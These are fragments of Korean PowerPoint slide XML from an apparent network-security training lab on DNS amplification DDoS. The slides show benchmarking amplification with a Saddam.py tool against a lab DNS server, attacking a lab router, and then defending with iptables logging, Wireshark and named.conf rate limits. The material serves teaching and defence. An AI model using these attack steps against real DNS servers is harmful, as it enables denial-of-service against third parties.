              <a:t>패킷의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>data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rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> restart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4) /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 수정</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sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/iptables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5) iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수정한 값을 적용하기 위해 서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service iptables restart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9217" name="_x247861160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A30B93-8357-4639-9D22-964A379AD6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832" y="926592"/>
            <a:ext cx="5400675" cy="3438525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9219" name="_x247863080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FAF6D21-0ED9-4F74-B7FB-B448FE8BAB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568" y="5202426"/>
            <a:ext cx="5295900" cy="449263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9221" name="_x247863080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6642B922-BA29-46C1-B6B0-D6A5B52AA2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926592"/>
            <a:ext cx="5400675" cy="3646488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9223" name="_x247862600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC26899-603C-4414-A161-2D1F5F8255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7674" y="5180201"/>
            <a:ext cx="5326063" cy="350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540553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3690938"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>6) tail -f /var/log/message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 실시간으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DROP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>되는 로그 확인</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392121" y="4248284"/>
            <a:ext cx="5616792" cy="2209606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>#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41" name="_x247862680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABD08CA-E4CF-4213-AC0C-80AE18A3DC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8848"/>
            <a:ext cx="5400675" cy="3081338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10243" name="_x247862680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99397CCC-E732-4B75-AAAA-C1D6A16E48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390" y="4645152"/>
            <a:ext cx="3260725" cy="392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79985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/Training/Unit/Net/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 14. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– DNS Amplification</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증폭 공격이 가능한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증폭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DoS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도메인은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example.com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DNS Amplification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DNS Amplification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방어할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DNS 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DNS Victim(CentOS 6.4 / 10.10.1.101) + DDWRT(10.10.1.1)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9217661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대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.101 example.com</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ dig : DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버에 질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답에 활용하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Command-line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>툴로서 도메인 분석 등에 활용 되고 있다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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>증폭 지수 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># python /root/Saddam.py benchmark –d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns.txt:example.com</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marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>배 증폭 가능함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 효과 확인을 위해 공격 대상 호스트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(10.10.1.1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>메시지 전송</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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CDD7370-2AB2-4B53-B728-657DF13B3F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="1405466"/>
            <a:ext cx="5400040" cy="3317748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D526DA-061F-4F54-A958-6AE5D137648C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="940102"/>
            <a:ext cx="5400040" cy="1935607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10588D4-007E-41FA-BB9B-8B4E11F1FE85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291462" y="3683301"/>
            <a:ext cx="5400040" cy="785368"/>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16431329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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>증폭 공격 수행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 ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답이 지연됨을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Ctrl + C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 공격 중지</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ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답 시간이 정상으로 복구됨을 확인</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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084362D9-AA37-45BA-85EB-5B28E38164D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="715904"/>
            <a:ext cx="5400040" cy="1654556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80CDA9C7-D213-4BF4-A5B0-3E1F7E79154A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="2775808"/>
            <a:ext cx="5400040" cy="3307842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D382A9-BCB0-4FAD-90DC-3E573B44E54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="715904"/>
            <a:ext cx="5400040" cy="1909191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C110515D-8934-4EBD-9D2A-A518F8E0455C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="3206468"/>
            <a:ext cx="5400040" cy="2670048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327512324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TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91563336-34FC-48F0-BDB5-EB9B3E13B470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392121" y="369000"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E6A2DB-FD5C-4AA2-A494-F01D7EEA6740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019628" y="989088"/>
            <a:ext cx="3985260" cy="479425"/>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12965261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/Training/Unit/Net/14</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 14. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– DNS Amplification</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일부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증폭 공격을 받는 중으로 보고되었다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Bind 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 설정을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하나의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에서 분당 요청할 수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쿼리의 수를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 DNS Amplification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DNS Amplification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방어할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DNS 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DNS Victim(CentOS 6.4 / 10.10.1.101) + DDWRT(10.10.1.1)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3B0801D1-9391-4CD4-B7B8-6A264D1A2AD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41564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 1) wireshark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 패킷 확인</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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249B49EA-BD74-477E-BE2D-B290D96B4619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="711502"/>
            <a:ext cx="5400040" cy="3643884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC1C7637-0B41-4FAA-A8F7-F2A144ECFC39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291462" y="711502"/>
            <a:ext cx="5400040" cy="3774059"/>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53451184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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>named.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 수정 </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named.conf</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named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep named</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> named</a:t>
            </a:r>
